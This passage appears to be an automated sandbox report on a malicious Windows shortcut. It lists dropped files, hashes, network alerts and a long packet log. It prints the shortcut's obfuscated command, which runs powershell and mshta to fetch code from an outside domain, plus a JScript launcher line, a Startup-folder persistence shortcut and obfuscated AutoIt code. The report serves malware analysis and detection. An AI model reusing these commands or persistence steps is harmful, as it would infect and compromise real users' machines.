                                                                              SHA-512:67EEB87AEE2567513FC6D5AE241E62D73874980EC18BB77C46DF4191A2EC64A6DB1200F7541B0F6E908B66D39ACE1D483CD1E33E90C165A6DBA01C35536E1541
                                                                              Malicious:false
                                                                              Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]

                                                                              C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js

                                                                              Download File
                                                                              Process:C:\Users\Public\Guard.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):184
                                                                              Entropy (8bit):4.736154105743425
                                                                              Encrypted:false
                                                                              SSDEEP:3:RiMIpGXfeNH5E5wWAX+Ro6p4EkD5yKXW/Zi+0/RaMl85uWAX+Ro6p4EkD5yKXW/f:RiJbNHCwWDKaJkDrXW/Zz0tl8wWDKaJX
                                                                              MD5:612D28A7A2758BAAF54DB34272446F87
                                                                              SHA1:D4671632FC2141EF2AB2455F8923BC5197B2FD68
                                                                              SHA-256:94A83DD87CE7268703585A40C52491DDC7D332380B82832951DED047AAE6D73A
                                                                              SHA-512:B4B64908C674F92F5D4B1E761E123957E8D5CD6C3F433D2D5C6ADD19101FD0610EE968222D4CED31E8F21F7F022D880E7E723E4171BC7DB18C37A2000A58565B
                                                                              Malicious:true
                                                                              Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")

                                                                              C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif

                                                                              Download File
                                                                              Process:C:\Users\Public\Guard.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):893608
                                                                              Entropy (8bit):6.62028134425878
                                                                              Encrypted:false
                                                                              SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                              MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                              SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                              SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                              SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\Marketing.pdf

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PDF document, version 1.3, 3 pages
                                                                              Category:dropped
                                                                              Size (bytes):3986
                                                                              Entropy (8bit):7.456004459274474
                                                                              Encrypted:false
                                                                              SSDEEP:96:6RHrsQ6Fc+YDxP8gpOwEBdOujxeB7knVQzWKB5Y+74C0sLJRSo:6trcPYDigiBdfetAMxm8BPRSo
                                                                              MD5:F1D1BF7BA473B16F95B0BAFE0E09A402
                                                                              SHA1:33CBC0601595EC233C96D8181D12CEAE9CEECE7A
                                                                              SHA-256:CFBACCD2CC5E9FCE35F05E87D7F5D8DF85CA47ECF0E8FDC44CFB701A70EB0DFE
                                                                              SHA-512:559918229442151AF1C1C48D55052BC94BB28E664CE5190B40BF0CE10A3381F1D9773F3FC4E1848CB7A5E34DE4279533E64F667F58F473DB61C824E861CF6F90
                                                                              Malicious:false
                                                                              Preview:%PDF-1.3.3 0 obj.<</Type /Page./Parent 1 0 R./Resources 2 0 R./Contents 4 0 R>>.endobj.4 0 obj.<</Filter /FlateDecode /Length 879>>.stream.x.}TM..:...+..U...?...P..+.(H...bO....$%..{f.8N..'.F...3...*.e..W..x.1...I...|X.4iD.B.".a.../f@0+....{.^9...(.Tk....k..4Hx4.U........3H..#.U.."..H...V$.k....HO ]... .....X.J<.......{...^&V.5|..:....z:....j2.7. .n.....=QA......ai..<H....|...#?.]............H...W%Y..{.k....CY)Xg>$....v.b.+c.o....),.6.E........>..>.Rk..~..n.I...].k........V...G.d...B..v.Ri......Or.....E*)sylC.....${.v.\ .*.**.\...#..a&pP~.Q.G92..WJ#t.Pf.....,.]..n..)../.a0...<.$...a..|&...O.Y-....N.=..R..3M.&D..a...j....>!..ZJ..G.c...yc..x.....7w......d.E.....j....|.E&.X.Q.,J>..)......7.%Z...9u....K7...\u.#FA..l.......C.@...N..^.e]dM).8}...|.cV...3....>..V....ufq....r..w-....,HU]..e.h.. .4.....8j....c.....?..L.t.c.f..i..$.{..I".vRc..[..\.............v..]..^.<MKQL..+......4...v...I\..6 ..H.........t...............^n.!O.\..>.o./.QW'....~.

                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):98
                                                                              Entropy (8bit):4.915531212533357
                                                                              Encrypted:false
                                                                              SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5yKXW/Zi+URAAy:HRYF5yjowkn23yKXW/Zzyy
                                                                              MD5:56D029782506F3E1F7EC40780D1DA27F
                                                                              SHA1:C7E0690DE9B31C951AC212A7E940E460267F2BA1
                                                                              SHA-256:5F412A72A3459ACA6A245DE1A280AB53CA5E6B306FECA32E0DF4B0B9B7863223
                                                                              SHA-512:1C5F108FB4325E4B47E9EE15F5D828569EE90676D5170D6D3B92BD13BD39CCAA68657CBB97761007154C73D2FFCFA8A3582879CB2097A899B22C1C83848A9D92
                                                                              Malicious:true
                                                                              Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..

                                                                              C:\Users\user\AppData\Roaming\PefjSkkhb.exe

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1083904
                                                                              Entropy (8bit):6.306473619816267
                                                                              Encrypted:false
                                                                              SSDEEP:24576:DrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaB1T:D2EYTb8atv1orq+pEiSDTj1VyvBa3
                                                                              MD5:567DE19C0E7E3A1FC845E51AC1C1D5D8
                                                                              SHA1:4C4FDEA73E0C98C2C82B6B1232EF7ECF5B99CCD1
                                                                              SHA-256:F1140750BA9FEAD0EF27B715D1BB2AE28864FE611068759F8EF4F8364AF559CB
                                                                              SHA-512:84C3A61A1F7A71E52DFE110CD975F6DA7EA0B2A83FA16F7B46C223ADE7B44D1F299BF0C108268502F144F5C93E0A74AB37B13D24B9540355658119768BF12C2A
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 32%
                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG....>PG.....PG.....PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(.#PG."(..*PG."(..PG.+PF..RG..9I.{PG..9D.*PG..9..*PG.+P.*PG..9E.*PG.Rich+PG.........................PE..d....^g.........."......4...R.......T.........@....................................qR....`...@...............@..............................\..|........@...@..Ho..............t...Pp..........................(...pp...............P..8............................text...(3.......4.................. ..`.rdata...B...P...D...8..............@..@.data... ........P...|..............@....pdata..Ho...@...p..................@..@.rsrc....@.......B...<..............@..@.reloc..t............~..............@..B................................................................................................................................................................................................

                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):55
                                                                              Entropy (8bit):4.306461250274409
                                                                              Encrypted:false
                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                              Malicious:false
                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                              Static File Info

                                                                              General

                                                                              File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=3, Archive, ctime=Sat Dec 7 08:09:57 2019, mtime=Sun Dec 15 09:39:10 2024, atime=Sat Dec 7 08:09:57 2019, length=41472, window=hidenormalshowminimized
                                                                              Entropy (8bit):0.011648986621868687
                                                                              TrID:
                                                                              • Windows Shortcut (20020/1) 100.00%
                                                                              File name:R8CAg00Db8.lnk
                                                                              File size:1'001'146 bytes
                                                                              MD5:cdbfcc4d882ca6b35d7429cebc384245
                                                                              SHA1:ef60efe666dc9eee33d4f847dde57aba34e78bd6
                                                                              SHA256:245641a41fbc20b6ff8e1b199ac9af9a103d6e9215e352f3f9e3aedec889b9e4
                                                                              SHA512:d7b85841d725cb389000a965dc6d74f7b9ca17bf2a5ae9ea0cffdd5de2629f7719658b16eb3807d9be711d68e6d5148bf281ee0328252e0ae89aaf53dc03f275
                                                                              SSDEEP:24:8U8Y3l+hpyAMkA+/44+4MlEPSL6wLaFacabqyI+pu4m:8y3sF/MlEQ6c+acaey3w4
                                                                              TLSH:A325CE0827DA5B78C376AF79683AF302CA717D86EC638F1E059016885495111B8A6FBA
                                                                              File Content Preview:L..................F.... ............Y...N..................................E....P.O. .:i.....+00.../C:\...................V.1......YI...Windows.@........OwH.YxT....(.....................R3..W.i.n.d.o.w.s.....Z.1......Y....System32..B........OwH.Y.X......

                                                                              File Icon

                                                                              Icon Hash:070f0f0f0b53c105

                                                                              Static Windows Shortcut Info

                                                                              General

                                                                              Relative Path:..\..\..\..\Windows\System32\forfiles.exe
                                                                              Command Line Argument:/p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep1
                                                                              Icon location:shell32.dll

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-18T21:00:18.291783+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449733147.45.49.15580TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 18, 2024 21:00:11.298986912 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:11.299041033 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:11.299122095 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:11.312048912 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:11.312060118 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:12.834747076 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:12.834834099 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:12.904428005 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:12.904459000 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:12.904827118 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:12.907851934 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:12.924390078 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:12.971339941 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.453735113 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.454997063 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:13.645953894 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.645970106 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.646056890 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.646085978 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:13.646111965 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.646122932 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:13.646161079 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:13.697057962 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.697082996 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.697243929 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:13.697297096 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.697335958 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:13.998509884 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.998523951 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.998569012 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.998630047 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:13.998656988 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:13.998694897 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:13.998694897 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:14.243156910 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:14.243175030 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:14.243242025 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:14.243262053 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:14.243326902 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:14.243344069 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:14.243427992 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:14.244862080 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:14.244883060 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:14.244926929 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:14.244930029 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:14.244942904 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:14.244960070 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:14.244976997 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:14.244986057 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:14.245028019 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:14.245029926 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:14.245065928 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:14.245393038 CET49730443192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:14.245412111 CET44349730147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:16.035377979 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:16.155220985 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:16.155653000 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:16.176245928 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:16.296875954 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:17.544663906 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:17.555494070 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:17.555598974 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:17.579575062 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:17.603683949 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:17.603810072 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:17.804616928 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:17.924276114 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.288752079 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.291671991 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.291783094 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.314171076 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.337371111 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.337554932 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.361507893 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.385541916 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.385623932 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.409648895 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.433835983 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.433938980 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.457784891 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.457798958 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.457861900 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.477323055 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.496414900 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.496428967 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.496815920 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.515706062 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.515960932 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.535001993 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.554265022 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.554279089 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.554335117 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.573530912 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.573606014 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.592864990 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.612077951 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.612093925 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.612531900 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.631503105 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.631582975 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.648629904 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.665884972 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.665946007 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.682998896 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.700272083 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.700407982 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.717359066 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.734373093 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.734447002 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.751383066 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.768178940 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.768192053 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.768234015 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.784256935 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.784353971 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.799784899 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.815395117 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.815486908 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.831003904 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.846276045 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.846352100 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.861423969 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.876346111 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.876514912 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.891381979 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.905827999 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.905843973 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.905957937 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.920173883 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.920583963 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.935446978 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.948054075 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.948113918 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.962009907 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.975732088 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:18.975807905 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:18.989171982 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.002938986 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.003066063 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.016056061 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.029231071 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.029246092 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.029304981 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.042165041 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.042254925 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.055119991 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.067713976 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.067827940 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.080162048 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.092654943 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.092982054 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.104409933 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.116421938 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.116491079 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.128506899 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.140366077 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.140381098 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.140414000 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.152084112 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.152146101 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.163573027 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.175168991 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.175338984 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.186359882 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.197546005 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.197604895 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.208837986 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.219912052 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.219985962 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.230752945 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.241605997 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.241625071 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.241652966 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.252266884 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.252319098 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.263077021 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.273353100 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.273402929 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.283864021 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.294107914 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.294150114 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.304176092 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.314225912 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.314284086 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.324297905 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.334378004 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.334397078 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.334434986 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.344053030 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.344111919 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.353692055 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.363600969 CET8049733147.45.49.155192.168.2.4
